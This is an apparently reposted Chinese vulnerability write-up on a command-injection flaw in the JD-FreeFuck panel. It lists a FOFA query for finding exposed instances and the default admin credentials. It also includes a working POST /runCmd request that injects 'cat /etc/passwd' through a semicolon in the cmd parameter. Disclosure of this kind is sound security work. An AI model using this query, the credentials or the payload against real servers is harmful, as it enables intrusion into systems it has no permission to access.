当前位置:网站首页>JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞

JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞

2022-04-23 18:05:00 孤桜懶契

漏洞描述

i JD-FreeFuck 存在後臺命令執行漏洞,由於傳參執行命令時沒有對內容過濾,導致可以執行任意命令,控制服務器 項目地址: https://github.com/meselson/JD-FreeFuck

漏洞影響

s JD-FreeFuck

空間測繪

d FOFA:title="京東薅羊毛控制面板"

漏洞複現

  • 訪問後登錄頁面如下

image-20220422224258613

  • 默認賬號useradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

個人博客

孤桜懶契:https://gylq.gitee.io/time

版权声明
本文为[孤桜懶契]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html

边栏推荐

猜你喜欢

随机推荐